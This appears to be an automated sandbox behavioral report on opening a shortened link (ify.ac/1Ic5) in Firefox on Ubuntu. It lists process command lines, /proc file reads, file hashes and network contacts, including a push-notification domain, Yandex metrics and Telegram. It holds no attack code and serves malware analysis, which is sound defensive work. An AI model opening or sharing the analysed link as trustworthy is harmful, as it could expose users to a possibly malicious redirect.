[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]

/usr/bin/dbus-launch

[dbus-launch --autolaunch=4816dd152e8c48ff97e9117d197c13d8 --binary-syntax --close-stderr]

/usr/libexec/xdg-desktop-portal

[/usr/libexec/xdg-desktop-portal]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -parentBuildID 20240108143603 -prefsLen 20982 -prefMapSize 234904 -appDir /usr/lib/firefox/browser {2ef1eef8-36be-4693-b040-b9991d309853} 1492 true socket]

/usr/libexec/xdg-document-portal

[/usr/libexec/xdg-document-portal]

/usr/libexec/xdg-permission-store

[/usr/libexec/xdg-permission-store]

/usr/libexec/xdg-desktop-portal-gtk

[/usr/libexec/xdg-desktop-portal-gtk]

/usr/libexec/gvfsd

[/usr/libexec/gvfsd]

/usr/libexec/gvfsd-fuse

[/usr/libexec/gvfsd-fuse /root/.cache/gvfs -f -o big_writes]

/usr/libexec/dconf-service

[/usr/libexec/dconf-service]

/usr/bin/nautilus

[/usr/bin/nautilus --gapplication-service]

/usr/libexec/gvfsd-trash

[/usr/libexec/gvfsd-trash --spawner :1.8 /org/gtk/gvfs/exec_spaw/0]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 1 -isForBrowser -prefsLen 20185 -prefMapSize 234904 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {65da9186-591a-462b-a64e-d5f018742534} 1492 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 2 -isForBrowser -prefsLen 26849 -prefMapSize 234904 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {ada7d652-6801-4c20-9f62-affdad637cb3} 1492 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 3 -isForBrowser -prefsLen 25603 -prefMapSize 234904 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {202f1efe-e0d7-449c-93b8-7c26f9416083} 1492 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -parentBuildID 20240108143603 -sandboxingKind 0 -prefsLen 27460 -prefMapSize 234904 -appDir /usr/lib/firefox/browser {e36fab77-0d00-4969-90ec-6a5eafb26495} 1492 true utility]

/usr/bin/gnome-keyring-daemon

[/usr/bin/gnome-keyring-daemon --start --foreground --components=secrets]

/usr/libexec/gvfs-udisks2-volume-monitor

[/usr/libexec/gvfs-udisks2-volume-monitor]

/usr/libexec/gvfs-afc-volume-monitor

[/usr/libexec/gvfs-afc-volume-monitor]

/usr/libexec/gvfs-mtp-volume-monitor

[/usr/libexec/gvfs-mtp-volume-monitor]

/usr/libexec/gvfs-gphoto2-volume-monitor

[/usr/libexec/gvfs-gphoto2-volume-monitor]

/usr/libexec/gvfs-goa-volume-monitor

[/usr/libexec/gvfs-goa-volume-monitor]

/usr/libexec/goa-daemon

[/usr/libexec/goa-daemon]

/usr/libexec/goa-identity-service

[/usr/libexec/goa-identity-service]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 4 -isForBrowser -prefsLen 28871 -prefMapSize 234904 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {5e60adea-b39d-488c-87ea-a269e201eae4} 1492 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 5 -isForBrowser -prefsLen 28909 -prefMapSize 234904 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {80c575f7-3694-47ab-bc62-65b6b2277e45} 1492 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 6 -isForBrowser -prefsLen 28909 -prefMapSize 234904 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {a973fb53-a5ad-474e-998c-6daf87bf8e38} 1492 true tab]

/usr/lib/firefox/firefox

[/usr/lib/firefox/firefox -contentproc -childID 7 -isForBrowser -prefsLen 28909 -prefMapSize 234904 -jsInitLen 229864 -parentBuildID 20240108143603 -greomni /usr/lib/firefox/omni.ja -appomni /usr/lib/firefox/browser/omni.ja -appDir /usr/lib/firefox/browser {fc3e9f66-17a6-4845-9f5a-a2c27633dbfd} 1492 true tab]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
US 1.1.1.1:53 firefox.settings.services.mozilla.com udp
US 1.1.1.1:53 firefox.settings.services.mozilla.com udp
US 1.1.1.1:53 prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 ify.ac udp
US 1.1.1.1:53 ify.ac udp
US 104.21.23.148:443 ify.ac tcp
US 1.1.1.1:53 location.services.mozilla.com udp
US 1.1.1.1:53 location.services.mozilla.com udp
US 1.1.1.1:53 prod.classify-client.prod.webservices.mozgcp.net udp
US 35.190.72.216:443 location.services.mozilla.com tcp
US 1.1.1.1:53 contile.services.mozilla.com udp
US 1.1.1.1:53 contile.services.mozilla.com udp
US 104.21.23.148:443 ify.ac udp
US 34.117.188.166:443 contile.services.mozilla.com tcp
US 35.190.72.216:443 location.services.mozilla.com udp
US 1.1.1.1:53 spocs.getpocket.com udp
US 1.1.1.1:53 spocs.getpocket.com udp
US 1.1.1.1:53 prod.ads.prod.webservices.mozgcp.net udp
US 34.117.188.166:443 spocs.getpocket.com tcp
US 1.1.1.1:53 getpocket.cdn.mozilla.net udp
US 1.1.1.1:53 getpocket.cdn.mozilla.net udp
US 34.120.5.221:443 getpocket.cdn.mozilla.net tcp
US 1.1.1.1:53 oasqi.nxt-psh.com udp
US 1.1.1.1:53 oasqi.nxt-psh.com udp
US 34.117.188.166:443 spocs.getpocket.com udp
US 1.1.1.1:53 mc.yandex.ru udp
US 1.1.1.1:53 mc.yandex.ru udp
US 172.67.194.119:443 oasqi.nxt-psh.com tcp
RU 77.88.21.119:443 mc.yandex.ru tcp
US 34.117.188.166:443 spocs.getpocket.com udp
US 1.1.1.1:53 content-signature-2.cdn.mozilla.net udp
US 1.1.1.1:53 content-signature-2.cdn.mozilla.net udp
US 172.67.194.119:443 oasqi.nxt-psh.com udp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 34.160.144.191:443 content-signature-2.cdn.mozilla.net tcp
US 1.1.1.1:53 nxt-psh.com udp
US 1.1.1.1:53 nxt-psh.com udp
US 104.21.20.211:443 nxt-psh.com tcp
US 104.21.20.211:443 nxt-psh.com udp
US 1.1.1.1:53 mc.yandex.com udp
US 1.1.1.1:53 mc.yandex.com udp
RU 93.158.134.119:443 mc.yandex.com tcp
US 1.1.1.1:53 ify.ac udp
US 1.1.1.1:53 shavar.services.mozilla.com udp
US 1.1.1.1:53 shavar.services.mozilla.com udp
US 1.1.1.1:53 shavar.prod.mozaws.net udp
US 44.242.121.21:443 shavar.services.mozilla.com tcp
US 1.1.1.1:53 push.services.mozilla.com udp
US 1.1.1.1:53 push.services.mozilla.com udp
US 1.1.1.1:53 autopush.prod.mozaws.net udp
US 1.1.1.1:53 autopush.prod.mozaws.net udp
US 34.107.243.93:443 push.services.mozilla.com tcp
US 1.1.1.1:53 tracking-protection.cdn.mozilla.net udp
US 1.1.1.1:53 tracking-protection.cdn.mozilla.net udp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 34.149.100.209:443 firefox.settings.services.mozilla.com tcp
US 1.1.1.1:53 firefox-settings-attachments.cdn.mozilla.net udp
US 1.1.1.1:53 firefox-settings-attachments.cdn.mozilla.net udp
US 1.1.1.1:53 attachments.prod.remote-settings.prod.webservices.mozgcp.net udp
US 34.117.121.53:443 firefox-settings-attachments.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 tracking-protection.prod.mozaws.net udp
US 34.120.158.37:443 tracking-protection.cdn.mozilla.net tcp
US 1.1.1.1:53 aus5.mozilla.org udp
US 1.1.1.1:53 aus5.mozilla.org udp
US 1.1.1.1:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 35.244.181.201:443 aus5.mozilla.org tcp
US 1.1.1.1:53 ciscobinary.openh264.org udp
US 1.1.1.1:53 ciscobinary.openh264.org udp
GB 88.221.134.209:80 ciscobinary.openh264.org tcp
US 1.1.1.1:53 ify.ac udp
US 1.1.1.1:53 t.me udp
US 1.1.1.1:53 t.me udp
NL 149.154.167.99:443 t.me tcp
NL 149.154.167.99:443 t.me tcp
US 1.1.1.1:53 prod.balrog.prod.cloudops.mozgcp.net udp
US 1.1.1.1:53 telegram.org udp
US 1.1.1.1:53 telegram.org udp
US 1.1.1.1:53 cdn5.cdn-telegram.org udp
US 1.1.1.1:53 cdn5.cdn-telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 34.111.108.175:443 cdn5.cdn-telegram.org tcp
US 34.111.108.175:443 cdn5.cdn-telegram.org udp
US 1.1.1.1:53 support.mozilla.org udp
US 1.1.1.1:53 support.mozilla.org udp
US 1.1.1.1:53 us-west1.prod.sumo.prod.webservices.mozgcp.net udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
GB 185.125.190.97:80 connectivity-check.ubuntu.com tcp

Files

/tmp/tmpaddon

MD5 30082ae40dc48af6343db2fd22cfc645
SHA1 3eb577555ee638e8beb01173e8f29e172747a728
SHA256 85d4b95f9b2075daee9b0e64bce8d9d7343d0dda10e6072d7f9485a68472ee76
SHA512 53a58bfb4c8124ad4f7655b99bfdea290033a085e0796b19245b33b91c0948fdac9f0c3e817130b352493a65d9a7a0fc8a7c1eedc618cdaa2b4580734a11cd9c

Analysis: behavioral6

Detonation Overview

Submitted

2024-07-14 17:56

Reported

2024-07-14 17:57

Platform

ubuntu2204-amd64-20240611-en

Max time kernel

1s

Max time network

5s

Command Line

[xdg-open https://ify.ac/1Ic5]

Signatures

Enumerates kernel/hardware configuration

Description Indicator Process Target
File opened for reading /sys/module/apparmor/parameters/enabled /usr/bin/dbus-daemon N/A
File opened for reading /sys/kernel/security/apparmor/features/dbus/mask /usr/bin/dbus-daemon N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/filesystems /usr/bin/sed N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/filesystems /usr/bin/dbus-daemon N/A
File opened for reading /proc/mounts /usr/bin/dbus-daemon N/A
File opened for reading /proc/sys/kernel/cap_last_cap /usr/bin/dbus-daemon N/A
File opened for reading /proc/filesystems /usr/bin/sed N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/1596/attr/apparmor/current /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/fd /usr/bin/dbus-send N/A
File opened for reading /proc/1596/status /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/filesystems /usr/bin/sed N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/self/fd /usr/bin/dbus-send N/A
File opened for reading /proc/1615/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/filesystems /usr/bin/sed N/A
File opened for reading /proc/1582/cmdline /usr/bin/dbus-daemon N/A
File opened for reading /proc/self/maps /usr/bin/grep N/A
File opened for reading /proc/filesystems /usr/bin/sed N/A

Processes

/usr/bin/xdg-open

[xdg-open https://ify.ac/1Ic5]

/usr/bin/dbus-send

[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]

/usr/bin/dbus-launch

[dbus-launch --autolaunch f2de92a803c744e586bd87567a26b68a --binary-syntax --close-stderr]

/usr/bin/dbus-daemon

[/usr/bin/dbus-daemon --syslog-only --fork --print-pid 5 --print-address 7 --session]

/usr/bin/grep

[grep = \"xfce4\"$]

/usr/bin/xprop

[xprop -root _DT_SAVE_MODE]

/usr/bin/grep

[grep -i ^xfce_desktop_window]

/usr/bin/xprop

[xprop -root]

/usr/bin/grep

[grep -q ^Enlightenment]

/usr/bin/uname

[uname]

/usr/bin/grep

[grep -q ^file://]

/usr/bin/egrep

[egrep -q ^[[:alpha:]+\.\-]+:]

/usr/local/sbin/grep

[grep -E -q ^[[:alpha:]+\.\-]+:]

/usr/local/bin/grep

[grep -E -q ^[[:alpha:]+\.\-]+:]

/usr/sbin/grep

[grep -E -q ^[[:alpha:]+\.\-]+:]

/usr/bin/grep

[grep -E -q ^[[:alpha:]+\.\-]+:]

/usr/bin/sed

[sed -n s/\(^[[:alnum:]+\.-]*\):.*$/\1/p]

/usr/bin/xdg-mime

[xdg-mime query default x-scheme-handler/https]

/usr/bin/dbus-send

[dbus-send --print-reply --dest=org.freedesktop.DBus /org/freedesktop/DBus org.freedesktop.DBus.GetNameOwner string:org.gnome.SessionManager]

/usr/bin/dbus-launch

[dbus-launch --autolaunch f2de92a803c744e586bd87567a26b68a --binary-syntax --close-stderr]

/usr/bin/grep

[grep = \"xfce4\"$]

/usr/bin/xprop

[xprop -root _DT_SAVE_MODE]

/usr/bin/grep

[grep -i ^xfce_desktop_window]

/usr/bin/xprop

[xprop -root]

/usr/bin/grep

[grep -q ^Enlightenment]

/usr/bin/uname

[uname]

/usr/bin/sed

[sed s/:/ /g]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/head

[head -n 1]

/usr/bin/grep

[grep x-scheme-handler/https= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]

/usr/bin/head

[head -n 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/grep

[grep x-scheme-handler/https= /.local/share/applications/defaults.list /.local/share/applications/mimeinfo.cache]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/head

[head -n 1]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/grep

[grep x-scheme-handler/https= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/head

[head -n 1]

/usr/bin/grep

[grep x-scheme-handler/https= /usr/local/share//applications/defaults.list /usr/local/share//applications/mimeinfo.cache]

/usr/bin/cut

[cut -d ; -f 1]

/usr/bin/cut

[cut -d = -f 2]

/usr/bin/head

[head -n 1]

/usr/bin/grep

[grep x-scheme-handler/https= /usr/share//applications/defaults.list /usr/share//applications/mimeinfo.cache]

/usr/bin/sed

[sed s/:/ /g]

/usr/bin/sed

[sed -e s|-|/|]

/usr/bin/sed

[sed -e s|-|/|]

/usr/bin/cut

[cut -d= -f 2-]

/usr/bin/which

[which firefox]

/usr/bin/cut

[cut -d= -f 2-]

/usr/bin/cut

[cut -d= -f 2-]

/usr/bin/cut

[cut -d= -f 2-]

/usr/bin/cut

[cut -d= -f 2-]

/usr/bin/firefox

[/usr/bin/firefox https://ify.ac/1Ic5]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp

Files

/root/.dbus/session-bus/f2de92a803c744e586bd87567a26b68a-0

MD5 75e581230f8e5d790ea568713f6cf2d2
SHA1 f924096f0b61f953e300a59073b7dc01522272be
SHA256 be5c7236ecb1c2828cc6b7358167206514f3f6acfeb9250826601459e4518e98
SHA512 f8a962704560428ce1ed8dbde35aaf58823dc1e888b8a18230c810d692b00bafe22c60d2bc932ac033d3df6a37d2884372b644ae85e52f565f6ef5f3a2344123